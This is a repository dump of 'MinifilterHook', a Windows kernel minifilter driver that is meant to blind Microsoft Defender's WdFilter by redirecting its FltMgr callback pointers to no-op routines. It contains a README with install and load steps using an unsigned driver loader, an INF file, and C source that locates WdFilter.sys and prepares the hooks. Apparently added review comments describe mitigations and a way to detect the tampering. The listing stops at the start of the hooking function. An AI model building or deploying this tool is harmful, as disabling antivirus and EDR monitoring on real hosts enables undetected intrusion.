├── HowItWorks.pdf ├── README.md ├── WdfltHook ├── WdfltHook.inf ├── WdfltHook.sln ├── WdfltHook │ ├── WdfltHook.c │ ├── WdfltHook.inf │ ├── WdfltHook.rc │ ├── WdfltHook.sln │ ├── WdfltHook.vcxproj │ ├── WdfltHook.vcxproj.filters │ ├── fltmgtr.h │ ├── ntdefs.h │ ├── restore_list.h │ └── x64 │ │ └── Release │ │ ├── WdfltHook.inf │ │ ├── WdfltHook.log │ │ ├── WdfltHook.obj │ │ ├── WdfltHook.res │ │ ├── WdfltHook.sys.recipe │ │ ├── WdfltHook.tlog │ │ ├── CL.command.1.tlog │ │ ├── CL.read.1.tlog │ │ ├── CL.write.1.tlog │ │ ├── Inf2Cat.command.1.tlog │ │ ├── WdfltHook.lastbuildstate │ │ ├── inf2cat-expand.10100.read.1.tlog │ │ ├── inf2cat-expand.10100.write.1.tlog │ │ ├── inf2cat-expand.10144.read.1.tlog │ │ ├── inf2cat-expand.10144.write.1.tlog │ │ ├── inf2cat-expand.10320.read.1.tlog │ │ ├── inf2cat-expand.10320.write.1.tlog │ │ ├── inf2cat-expand.10720.read.1.tlog │ │ ├── inf2cat-expand.10720.write.1.tlog │ │ ├── inf2cat-expand.10748.read.1.tlog │ │ ├── inf2cat-expand.10748.write.1.tlog │ │ ├── inf2cat-expand.10780.read.1.tlog │ │ ├── inf2cat-expand.10780.write.1.tlog │ │ ├── inf2cat-expand.11144.read.1.tlog │ │ ├── inf2cat-expand.11144.write.1.tlog │ │ ├── inf2cat-expand.11200.read.1.tlog │ │ ├── inf2cat-expand.11200.write.1.tlog │ │ ├── inf2cat-expand.11596.read.1.tlog │ │ ├── inf2cat-expand.11596.write.1.tlog │ │ ├── inf2cat-expand.2880.read.1.tlog │ │ ├── inf2cat-expand.2880.write.1.tlog │ │ ├── inf2cat-expand.4016.read.1.tlog │ │ ├── inf2cat-expand.4016.write.1.tlog │ │ ├── inf2cat-expand.4332.read.1.tlog │ │ ├── inf2cat-expand.4332.write.1.tlog │ │ ├── inf2cat-expand.4344.read.1.tlog │ │ ├── inf2cat-expand.4344.write.1.tlog │ │ ├── inf2cat-expand.5868.read.1.tlog │ │ ├── inf2cat-expand.5868.write.1.tlog │ │ ├── inf2cat-expand.5884.read.1.tlog │ │ ├── inf2cat-expand.5884.write.1.tlog │ │ ├── inf2cat-expand.6024.read.1.tlog │ │ ├── inf2cat-expand.6024.write.1.tlog │ │ ├── inf2cat-expand.7112.read.1.tlog │ │ ├── inf2cat-expand.7112.write.1.tlog │ │ ├── 
inf2cat-expand.8152.read.1.tlog │ │ ├── inf2cat-expand.8152.write.1.tlog │ │ ├── inf2cat-expand.8376.read.1.tlog │ │ ├── inf2cat-expand.8376.write.1.tlog │ │ ├── inf2cat-expand.8756.read.1.tlog │ │ ├── inf2cat-expand.8756.write.1.tlog │ │ ├── inf2cat-expand.9316.read.1.tlog │ │ ├── inf2cat-expand.9316.write.1.tlog │ │ ├── inf2cat-expand.9328.read.1.tlog │ │ ├── inf2cat-expand.9328.write.1.tlog │ │ ├── inf2cat-expand.9368.read.1.tlog │ │ ├── inf2cat-expand.9368.write.1.tlog │ │ ├── inf2cat-expand.9388.read.1.tlog │ │ ├── inf2cat-expand.9388.write.1.tlog │ │ ├── inf2cat-expand.9552.read.1.tlog │ │ ├── inf2cat-expand.9552.write.1.tlog │ │ ├── inf2cat-expand.9576.read.1.tlog │ │ ├── inf2cat-expand.9576.write.1.tlog │ │ ├── inf2cat-expand.9608.read.1.tlog │ │ ├── inf2cat-expand.9608.write.1.tlog │ │ ├── inf2cat-expand.9632.read.1.tlog │ │ ├── inf2cat-expand.9632.write.1.tlog │ │ ├── inf2cat-expand.9636.read.1.tlog │ │ ├── inf2cat-expand.9636.write.1.tlog │ │ ├── inf2cat-expand.9752.read.1.tlog │ │ ├── inf2cat-expand.9752.write.1.tlog │ │ ├── inf2cat-expand.read.1.tlog │ │ ├── inf2cat-expand.write.1.tlog │ │ ├── inf2cat.read.1.tlog │ │ ├── inf2cat.write.1.tlog │ │ ├── link.command.1.tlog │ │ ├── link.read.1.tlog │ │ ├── link.write.1.tlog │ │ ├── rc.command.1.tlog │ │ ├── rc.read.1.tlog │ │ ├── rc.write.1.tlog │ │ ├── signtool.command.1.tlog │ │ ├── signtool.read.1.tlog │ │ ├── signtool.timestamp.1.tlog │ │ ├── signtool.write.1.tlog │ │ ├── stampinf.command.1.tlog │ │ ├── stampinf.read.1.tlog │ │ └── stampinf.write.1.tlog │ │ └── vc142.pdb └── x64 │ └── Release │ ├── WdfltHook.cer │ ├── WdfltHook.inf │ ├── WdfltHook.pdb │ ├── WdfltHook.sys │ └── WdfltHook │ ├── WdfltHook.inf │ ├── WdfltHook.sys │ └── wdflthook.cat └── gitignore.txt /HowItWorks.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/HowItWorks.pdf 
-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MinifilterHook 2 | Silence file system monitoring components by hooking their minifilters 3 | 4 | Tested on Windows 10 1903, 21H2 and 22H2 against WdFilter 5 | 6 | POC can be easily modified to target other filter drivers -> simply change TARGET_FILTER_NAME and TARGET_FILTER_DRIVER 7 | 8 | # Usage: 9 | **Install .inf file -> right click + install or use SetupApi to install programmatically** 10 | 11 | **Load WdfltHook.sys -> via an unsigned driver loader like : https://github.com/0mWindyBug/KDP-compatible-driver-loader/tree/main** 12 | 13 | # How it works 14 | See "HowItWorks.pdf" (English) or https://www.digitalwhisper.co.il/files/Zines/0x9C/DW156-2-FilteringMinifilters.pdf (Hebrew) 15 | *************************** 16 | # Demo 17 | Before loading our driver: 18 | 19 | ![demo1](https://github.com/0mWindyBug/MinifilterHook/assets/139051196/27474da0-726d-4e26-b785-9926138f23a8) 20 | 21 | After loading our driver: 22 | 23 | ![demp4](https://github.com/0mWindyBug/MinifilterHook/assets/139051196/39a15be7-5233-47f0-948e-b056beac0aba) 24 | 25 | 26 | # Notes 27 | - Thanks to @GetRektBoy724 for his contribution 28 | - We restore everything during unload so be aware 29 | - Similar implementation using only a r/w primitive from UM (no driver) has been published & integrated to https://github.com/wavestone-cdt/EDRSandblast 30 | 31 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook.inf: -------------------------------------------------------------------------------- 1 | ;;; 2 | ;;; WdfltHook 3 | ;;; 4 | 5 | [Version] 6 | Signature = "$Windows NT$" 7 | ; TODO - Change the Class and ClassGuid to match the Load Order Group value, see https://msdn.microsoft.com/en-us/windows/hardware/gg462963 8 | ; Class = "ActivityMonitor" ;This is determined by the work 
this filter driver does 9 | ; ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Load Order Group value 10 | Class = "ActivityMonitor" 11 | ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} 12 | Provider = "Template" 13 | DriverVer = 09/29/2023,23.51.50.349 14 | CatalogFile = WdfltHook.cat 15 | PnpLockDown=1 16 | 17 | [DestinationDirs] 18 | DefaultDestDir = 12 19 | MiniFilter.DriverFiles = 12 ;%windir%\system32\drivers 20 | 21 | ;; 22 | ;; Default install sections 23 | ;; 24 | 25 | [DefaultInstall] 26 | OptionDesc = %ServiceDescription% 27 | CopyFiles = MiniFilter.DriverFiles 28 | 29 | [DefaultInstall.Services] 30 | AddService = %ServiceName%,,MiniFilter.Service 31 | 32 | ;; 33 | ;; Default uninstall sections 34 | ;; 35 | 36 | [DefaultUninstall] 37 | DelFiles = MiniFilter.DriverFiles 38 | 39 | [DefaultUninstall.Services] 40 | DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting 41 | 42 | ; 43 | ; Services Section 44 | ; 45 | 46 | [MiniFilter.Service] 47 | DisplayName = %ServiceName% 48 | Description = %ServiceDescription% 49 | ServiceBinary = %12%\%DriverName%.sys ;%windir%\system32\drivers\ 50 | Dependencies = "FltMgr" 51 | ServiceType = 2 ;SERVICE_FILE_SYSTEM_DRIVER 52 | StartType = 3 ;SERVICE_DEMAND_START 53 | ErrorControl = 1 ;SERVICE_ERROR_NORMAL 54 | ; TODO - Change the Load Order Group value 55 | ; LoadOrderGroup = "FSFilter Activity Monitor" 56 | LoadOrderGroup = "FSFilter Activity Monitor" 57 | AddReg = MiniFilter.AddRegistry 58 | 59 | ; 60 | ; Registry Modifications 61 | ; 62 | 63 | [MiniFilter.AddRegistry] 64 | HKR,,"DebugFlags",0x00010001 ,0x0 65 | HKR,,"SupportedFeatures",0x00010001,0x3 66 | HKR,"Instances","DefaultInstance",0x00000000,%DefaultInstance% 67 | HKR,"Instances\"%Instance1.Name%,"Altitude",0x00000000,%Instance1.Altitude% 68 | HKR,"Instances\"%Instance1.Name%,"Flags",0x00010001,%Instance1.Flags% 69 | 70 | ; 71 | ; Copy Files 72 | ; 73 | 74 | [MiniFilter.DriverFiles] 75 | 
%DriverName%.sys 76 | 77 | [SourceDisksFiles] 78 | WdfltHook.sys = 1,, 79 | 80 | [SourceDisksNames] 81 | 1 = %DiskId1%,,, 82 | 83 | ;; 84 | ;; String Section 85 | ;; 86 | 87 | [Strings] 88 | ServiceDescription = "WdfltHook Mini-Filter Driver" 89 | ServiceName = "WdfltHook" 90 | DriverName = "WdfltHook" 91 | DiskId1 = "WdfltHook Device Installation Disk" 92 | 93 | ;Instances specific information. 94 | DefaultInstance = "WdfltHook Instance" 95 | Instance1.Name = "WdfltHook Instance" 96 | ; TODO - Change the altitude value, see https://msdn.microsoft.com/en-us/windows/hardware/drivers/ifs/load-order-groups-and-altitudes-for-minifilter-drivers 97 | Instance1.Altitude = "370030" 98 | Instance1.Flags = 0x0 ; Allow all attachments 99 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.33927.289 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WdfltHook", "WdfltHook\WdfltHook.vcxproj", "{0D6423DD-7D02-4436-8C83-7F2069F5F388}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|ARM = Debug|ARM 11 | Debug|ARM64 = Debug|ARM64 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|ARM = Release|ARM 15 | Release|ARM64 = Release|ARM64 16 | Release|x64 = Release|x64 17 | Release|x86 = Release|x86 18 | EndGlobalSection 19 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 20 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM.ActiveCfg = Debug|ARM 21 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM.Build.0 = Debug|ARM 22 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM.Deploy.0 = Debug|ARM 23 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM64.ActiveCfg = Debug|ARM64 24 | 
{0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM64.Build.0 = Debug|ARM64 25 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM64.Deploy.0 = Debug|ARM64 26 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x64.ActiveCfg = Debug|x64 27 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x64.Build.0 = Debug|x64 28 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x64.Deploy.0 = Debug|x64 29 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x86.ActiveCfg = Debug|Win32 30 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x86.Build.0 = Debug|Win32 31 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x86.Deploy.0 = Debug|Win32 32 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM.ActiveCfg = Release|ARM 33 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM.Build.0 = Release|ARM 34 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM.Deploy.0 = Release|ARM 35 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM64.ActiveCfg = Release|ARM64 36 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM64.Build.0 = Release|ARM64 37 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM64.Deploy.0 = Release|ARM64 38 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x64.ActiveCfg = Release|x64 39 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x64.Build.0 = Release|x64 40 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x64.Deploy.0 = Release|x64 41 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x86.ActiveCfg = Release|Win32 42 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x86.Build.0 = Release|Win32 43 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x86.Deploy.0 = Release|Win32 44 | EndGlobalSection 45 | GlobalSection(SolutionProperties) = preSolution 46 | HideSolutionNode = FALSE 47 | EndGlobalSection 48 | GlobalSection(ExtensibilityGlobals) = postSolution 49 | SolutionGuid = {55558C6C-46F7-434F-A023-93E4BC6B38AD} 50 | EndGlobalSection 51 | EndGlobal 52 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/WdfltHook.c: 
--------------------------------------------------------------------------------
//
// WdfltHook.c
//
// Minifilter driver whose DriverEntry locates the "WdFilter" minifilter
// (Microsoft Defender's file-system filter), enumerates its instances and
// overwrites the pre/post operation callback pointers FltMgr keeps for those
// instances with the no-op routines WdfltHookPreOperation /
// WdfltHookPostOperation defined in this file. While this driver is loaded,
// WdFilter therefore no longer sees file I/O on the hooked instances. This is
// an AV/EDR-blinding technique.
//
// Defender notes (review):
//  - The README loads this via an unsigned driver loader. The standard
//    mitigations are driver signature enforcement, HVCI (memory integrity) and
//    Microsoft's vulnerable-driver blocklist; keep untrusted kernel code out.
//  - The driver registers itself with FltMgr (FltRegisterFilter below) under the
//    INF's service name "WdfltHook" at altitude 370030, so it appears in the
//    filter list (e.g. `fltmc filters`) like any other minifilter.
//  - The tamper is detectable with the inverse of IsCallbackNode(): a callback
//    node of a WdFilter instance whose PreOperation/PostOperation pointers do NOT
//    fall inside the WdFilter.sys image range has been redirected.
//  - Every DbgPrint in this file is prefixed "[WdFilter_Hook]".
//
// NOTE(review): the header names of the five #include lines below were lost
// when this listing was extracted. The repository tree shows fltmgtr.h,
// ntdefs.h and restore_list.h next to this file; presumably they supply
// PRESTORE_NODE, PCALLBACK_NODE and PROTOTYPE_ZWQUERYSYSTEMINFORMATION.
// Verify against the repository.
//
#include
#include
#include
#include
#include

#pragma prefast(disable:__WARNING_ENCODE_MEMBER_FUNCTION_POINTER, "Not valid for kernel mode drivers")
#define DRIVER_TAG 'dtag'                    // pool tag for this driver's allocations
#define TARGET_FILTER_NAME L"WdFilter"        // FltMgr filter name passed to FltGetFilterFromName
#define TARGET_FILTER_DRIVER "WdFilter.sys"   // image file name matched in the loaded-module list


int HooksExecuting = 0;                       // not referenced anywhere in this file
DWORD64 TargetDriverStart = 0;                // image base of TARGET_FILTER_DRIVER, set by InitDriverGlobals
ULONG TargetDriverSize = 0;                   // image size of TARGET_FILTER_DRIVER, set by InitDriverGlobals

ULONG_PTR OperationStatusCtx = 1;             // counter handed to FltRequestOperationStatusCallback as context

PRESTORE_NODE RestoreList = NULL;             // head of the (slot address, original value) list used at unload
PFLT_FILTER gFilterHandle;                    // this driver's own filter handle from FltRegisterFilter
LONG64 null_address = 0x0;                    // not referenced anywhere in this file

#define PTDBG_TRACE_ROUTINES 0x00000001
#define PTDBG_TRACE_OPERATION_STATUS 0x00000002

ULONG gTraceFlags = 0;                        // trace mask for PT_DBG_PRINT; 0 disables all trace output


// Conditional trace: prints only when the requested level is set in gTraceFlags.
#define PT_DBG_PRINT( _dbgLevel, _string ) \
    (FlagOn(gTraceFlags,(_dbgLevel)) ? \
        DbgPrint _string : \
        ((int)0))

/*************************************************************************
    Prototypes
*************************************************************************/


// RESTORE LIST FUNCTIONS


// Record the original content of a callback slot so WdfltHookUnload can put it
// back.
//
// AddrOfCallback: address of the 8-byte slot that is about to be overwritten.
// Callback:       the value currently stored in that slot.
//
// A node is allocated from NonPagedPool and appended to the tail of the global
// RestoreList. If the allocation fails the original value is silently not
// recorded, so that slot cannot be restored at unload.
VOID SaveOrigCallback(PVOID AddrOfCallback, LONG64 Callback)
{
    PRESTORE_NODE NewNode = ExAllocatePoolWithTag(NonPagedPool, sizeof(RESTORE_NODE), DRIVER_TAG);
    if (NewNode)
    {
        NewNode->AddrOfCallback = AddrOfCallback;
        NewNode->Callback = Callback;
        NewNode->Next = NULL;
        if (RestoreList == NULL)
        {
            RestoreList = NewNode;
        }
        else
        {
            // walk to the tail so nodes are restored in the order they were saved
            PRESTORE_NODE current = RestoreList;
            while (current->Next != NULL)
            {
                current = current->Next;
            }
            current->Next = NewNode;
        }
    }
}

// Write every recorded original value back into its slot, walking RestoreList
// head to tail. Does nothing when nothing was recorded; the success message is
// printed either way.
VOID UnhookCallbacks()
{
    if (RestoreList)
    {
        PRESTORE_NODE current = RestoreList;
        while (current != NULL)
        {
            InterlockedExchange64(current->AddrOfCallback, current->Callback);
            current = current->Next;
        }
    }
    DbgPrint("[WdFilter_Hook] Successfully Unhooked Callbacks!\n");
}


// Free every RestoreList node.
//
// NOTE(review): `current->Next` is read after ExFreePool(current), a
// use-after-free, and RestoreList is left pointing at freed memory. Unload of
// this driver is therefore not reliable; a bugcheck with a kernel memory dump at
// unload is a plausible forensic artifact on an affected host.
VOID CleanupRestoreList()
{
    if (RestoreList)
    {
        PRESTORE_NODE current = RestoreList;
        while (current != NULL)
        {
            ExFreePool(current);
            current = current->Next;
        }
    }

}











// Prototypes below appear to follow the WDK minifilter sample layout (PT_DBG_*
// naming); most of the instance/teardown routines are template code that only
// traces.
EXTERN_C_START

DRIVER_INITIALIZE DriverEntry;
NTSTATUS
DriverEntry (
    _In_ PDRIVER_OBJECT DriverObject,
    _In_ PUNICODE_STRING RegistryPath
    );

NTSTATUS
WdfltHookInstanceSetup (
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _In_ FLT_INSTANCE_SETUP_FLAGS Flags,
    _In_ DEVICE_TYPE VolumeDeviceType,
    _In_ FLT_FILESYSTEM_TYPE VolumeFilesystemType
    );

VOID
WdfltHookInstanceTeardownStart (
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _In_ FLT_INSTANCE_TEARDOWN_FLAGS Flags
    );

VOID
WdfltHookInstanceTeardownComplete (
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _In_ FLT_INSTANCE_TEARDOWN_FLAGS Flags
    );

NTSTATUS
WdfltHookUnload (
    _In_ FLT_FILTER_UNLOAD_FLAGS Flags
    );

NTSTATUS
WdfltHookInstanceQueryTeardown (
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _In_ FLT_INSTANCE_QUERY_TEARDOWN_FLAGS Flags
    );

FLT_PREOP_CALLBACK_STATUS
WdfltHookPreOperation (
    _Inout_ PFLT_CALLBACK_DATA Data,
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _Flt_CompletionContext_Outptr_ PVOID *CompletionContext
    );

VOID
WdfltHookOperationStatusCallback (
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _In_ PFLT_IO_PARAMETER_BLOCK ParameterSnapshot,
    _In_ NTSTATUS OperationStatus,
    _In_ PVOID RequesterContext
    );

FLT_POSTOP_CALLBACK_STATUS
WdfltHookPostOperation (
    _Inout_ PFLT_CALLBACK_DATA Data,
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _In_opt_ PVOID CompletionContext,
    _In_ FLT_POST_OPERATION_FLAGS Flags
    );

FLT_PREOP_CALLBACK_STATUS
WdfltHookPreOperationNoPostOperation (
    _Inout_ PFLT_CALLBACK_DATA Data,
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _Flt_CompletionContext_Outptr_ PVOID *CompletionContext
    );

BOOLEAN
WdfltHookDoRequestOperationStatus(
    _In_ PFLT_CALLBACK_DATA Data
    );

EXTERN_C_END

//
// Assign text sections for each routine.
//

#ifdef ALLOC_PRAGMA
#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, WdfltHookUnload)
#pragma alloc_text(PAGE, WdfltHookInstanceQueryTeardown)
#pragma alloc_text(PAGE, WdfltHookInstanceSetup)
#pragma alloc_text(PAGE, WdfltHookInstanceTeardownStart)
#pragma alloc_text(PAGE, WdfltHookInstanceTeardownComplete)
#endif

//
// operation registration
//
// Intentionally empty: this driver registers no pre/post callbacks of its own.
// WdfltHookPreOperation / WdfltHookPostOperation are only ever reached through
// the pointers HookTargetFilter writes into WdFilter's callback nodes, so this
// driver's own filter sees no I/O and is otherwise inert.
//

CONST FLT_OPERATION_REGISTRATION Callbacks[] = {



    { IRP_MJ_OPERATION_END }
};



// Registration record for this driver's own (inert) filter: no contexts, no
// operation callbacks, template instance/unload routines.
CONST FLT_REGISTRATION FilterRegistration = {

    sizeof( FLT_REGISTRATION ),         // Size
    FLT_REGISTRATION_VERSION,           // Version
    0,                                  // Flags

    NULL,                               // Context
    Callbacks,                          // Operation callbacks

    WdfltHookUnload,                    // MiniFilterUnload

    WdfltHookInstanceSetup,             // InstanceSetup
    WdfltHookInstanceQueryTeardown,     // InstanceQueryTeardown
    WdfltHookInstanceTeardownStart,     // InstanceTeardownStart
    WdfltHookInstanceTeardownComplete,  // InstanceTeardownComplete

    NULL,                               // GenerateFileName
    NULL,                               // GenerateDestinationFileName
    NULL                                // NormalizeNameComponent

};



// Template instance-setup callback: attaches to every volume (always returns
// STATUS_SUCCESS) and only traces.
NTSTATUS
WdfltHookInstanceSetup (
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _In_ FLT_INSTANCE_SETUP_FLAGS Flags,
    _In_ DEVICE_TYPE VolumeDeviceType,
    _In_ FLT_FILESYSTEM_TYPE VolumeFilesystemType
    )

{
    UNREFERENCED_PARAMETER( FltObjects );
    UNREFERENCED_PARAMETER( Flags );
    UNREFERENCED_PARAMETER( VolumeDeviceType );
    UNREFERENCED_PARAMETER( VolumeFilesystemType );

    PAGED_CODE();

    PT_DBG_PRINT( PTDBG_TRACE_ROUTINES,
                  ("WdfltHook!WdfltHookInstanceSetup: Entered\n") );

    return STATUS_SUCCESS;
}


// Template query-teardown callback: always allows the instance to be torn down.
NTSTATUS
WdfltHookInstanceQueryTeardown (
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _In_ FLT_INSTANCE_QUERY_TEARDOWN_FLAGS Flags
    )

{
    UNREFERENCED_PARAMETER( FltObjects );
    UNREFERENCED_PARAMETER( Flags );

    PAGED_CODE();

    PT_DBG_PRINT( PTDBG_TRACE_ROUTINES,
                  ("WdfltHook!WdfltHookInstanceQueryTeardown: Entered\n") );

    return STATUS_SUCCESS;
}


// Template teardown-start callback: trace only.
VOID
WdfltHookInstanceTeardownStart (
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _In_ FLT_INSTANCE_TEARDOWN_FLAGS Flags
    )

{
    UNREFERENCED_PARAMETER( FltObjects );
    UNREFERENCED_PARAMETER( Flags );

    PAGED_CODE();

    PT_DBG_PRINT( PTDBG_TRACE_ROUTINES,
                  ("WdfltHook!WdfltHookInstanceTeardownStart: Entered\n") );
}


// Template teardown-complete callback: trace only.
VOID
WdfltHookInstanceTeardownComplete (
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _In_ FLT_INSTANCE_TEARDOWN_FLAGS Flags
    )

{
    UNREFERENCED_PARAMETER( FltObjects );
    UNREFERENCED_PARAMETER( Flags );

    PAGED_CODE();

    PT_DBG_PRINT( PTDBG_TRACE_ROUTINES,
                  ("WdfltHook!WdfltHookInstanceTeardownComplete: Entered\n") );
}


/*************************************************************************
    MiniFilter initialization and unload routines.
*************************************************************************/

// Return a pointer to the component after the last '\\' in FullName, or NULL
// when no backslash is found.
//
// The scan starts at index FullNameLength (the terminating NUL) and stops before
// index 0, so a backslash at index 0 is never examined. The only caller,
// InitDriverGlobals, passes the result straight to strcmp, so a NULL result for
// a path without a backslash would dereference NULL.
PCHAR GetNameFromFullName(PCHAR FullName) {
    SIZE_T FullNameLength = strlen(FullName);

    for (SIZE_T i = FullNameLength; i > 0; i--) {
        if (*(FullName + i) == '\\') {
            return FullName + i + 1;
        }
    }

    return NULL;
}

// Heuristic used by the scan in HookTargetFilter: PotentialCallbackNode is
// accepted as the callback node of FltInstance when its Instance field equals
// FltInstance and both its PreOperation and PostOperation pointers lie strictly
// inside (DriverStartAddr, DriverStartAddr + DriverSize).
//
// With DriverStartAddr == 0 and DriverSize == 0 (InitDriverGlobals did not find
// the target) the range test can never hold, so nothing is hooked.
//
// Detection note: the same predicate, inverted, flags tampering — a node of a
// WdFilter instance whose callbacks point outside WdFilter.sys has been
// redirected.
BOOLEAN IsCallbackNode(PCALLBACK_NODE PotentialCallbackNode, PFLT_INSTANCE FltInstance, DWORD64 DriverStartAddr, DWORD64 DriverSize) {
    // take the range of the driver instead of enumerating the driver every validation
    return ((PotentialCallbackNode->Instance == FltInstance) &&
        (DWORD64)PotentialCallbackNode->PreOperation > DriverStartAddr &&
        (DWORD64)PotentialCallbackNode->PreOperation < (DriverStartAddr + DriverSize) &&
        (DWORD64)PotentialCallbackNode->PostOperation > DriverStartAddr &&
        (DWORD64)PotentialCallbackNode->PostOperation < (DriverStartAddr + DriverSize));
}

// Resolve the image base and size of TARGET_FILTER_DRIVER from the kernel's
// loaded-module list and store them in TargetDriverStart / TargetDriverSize.
//
// Returns TargetDriverStart cast to PVOID, or NULL on the early-exit paths.
// When the module is not in the list both globals stay 0 and NULL is returned
// as well; DriverEntry ignores the return value either way.
//
// The raw numbers are 0x0B = SystemModuleInformation and
// 0xC0000004 = STATUS_INFO_LENGTH_MISMATCH. ZwQuerySystemInformation is
// resolved at run time through MmGetSystemRoutineAddress rather than imported.
//
// NOTE(review): the `return NULL` after a failed query leaks ModuleInformation.
// The while loop cannot iterate twice: any non-success status (including a
// second STATUS_INFO_LENGTH_MISMATCH) takes that early return first.
// LocalIntBase and output are unused locals.
PVOID InitDriverGlobals()
{
    PVOID LocalIntBase = NULL;
    PRTL_PROCESS_MODULES ModuleInformation = NULL;
    NTSTATUS result;
    ULONG SizeNeeded;
    SIZE_T InfoRegionSize;
    BOOL output = FALSE;
    PROTOTYPE_ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
    UNICODE_STRING ZQSIname;
    // Get addr of zqsi
    RtlInitUnicodeString(&ZQSIname, L"ZwQuerySystemInformation");
    ZwQuerySystemInformation = (PROTOTYPE_ZWQUERYSYSTEMINFORMATION)MmGetSystemRoutineAddress(&ZQSIname);
    // Get info size
    result = ZwQuerySystemInformation((SYSTEM_INFORMATION_CLASS)0x0B, NULL, 0, &SizeNeeded);
    if (result != 0xC0000004)
    {
        return NULL;
    }
    InfoRegionSize = SizeNeeded;
    // Get Info
    while (result == 0xC0000004)
    {
        // pad the requested size by a page in case the module list grew
        InfoRegionSize += 0x1000;
        ModuleInformation = (PRTL_PROCESS_MODULES)ExAllocatePool(NonPagedPoolNx, InfoRegionSize);
        if (ModuleInformation == NULL)
        {
            return NULL;
        }
        result = ZwQuerySystemInformation((SYSTEM_INFORMATION_CLASS)0x0B, (PVOID)ModuleInformation, (ULONG)InfoRegionSize, &SizeNeeded);
        if (!NT_SUCCESS(result))
        {
            return NULL;
        }
        // Enumerate through loaded drivers
        for (DWORD i = 0; i < ModuleInformation->NumberOfModules; i++)
        {
            // match on the file name component only; the last match wins
            if (!strcmp(GetNameFromFullName((PCHAR)ModuleInformation->Modules[i].FullPathName), TARGET_FILTER_DRIVER))
            {
                TargetDriverStart = (DWORD64)ModuleInformation->Modules[i].ImageBase;
                TargetDriverSize = ModuleInformation->Modules[i].ImageSize;
                DbgPrint("[WdFilter_Hook] Init Target Driver : Start at %llx , Size is %d \n", TargetDriverStart, TargetDriverSize);
            }
        }




    }
    ExFreePool(ModuleInformation);
    return (PVOID)TargetDriverStart;
}

// Locate the filter named FilterName, enumerate its instances and, for each
// instance, redirect the callback node FltMgr keeps for it to this driver's
// no-op pre/post routines. Original pointers are recorded with SaveOrigCallback
// so WdfltHookUnload can restore them.
//
// FilterName: wide filter name (TARGET_FILTER_NAME from DriverEntry).
// Returns:    STATUS_UNSUCCESSFUL if FltGetFilterFromName fails,
//             STATUS_INSUFFICIENT_RESOURCES if the instance array cannot be
//             allocated, otherwise the last FltEnumerateInstances /
//             MmCopyMemory status.
//
// How the node is found: 0x230 bytes of each (opaque) FLT_INSTANCE are copied
// with MmCopyMemory and every byte offset of the copy is read as a 64-bit value,
// filtered with MmIsAddressValid and tested with IsCallbackNode against the
// image range from InitDriverGlobals. The 0x230 size is hard-coded; presumably
// it is what the README's tested builds required — TODO confirm. Note that
// MmIsAddressValid only says a page is currently mapped; it is not a type check.
//
// NOTE(review): CurrentInstanceVA is not NULL-checked and is not freed on the
// success path (one 0x230-byte NonPagedPool leak per instance), and on the
// STATUS_INSUFFICIENT_RESOURCES path fltobj is not dereferenced.
// TargetCallbackNode is an unused local.
NTSTATUS HookTargetFilter(PCWSTR FilterName)
{
    SIZE_T NumBytesReadFromInst = 0;
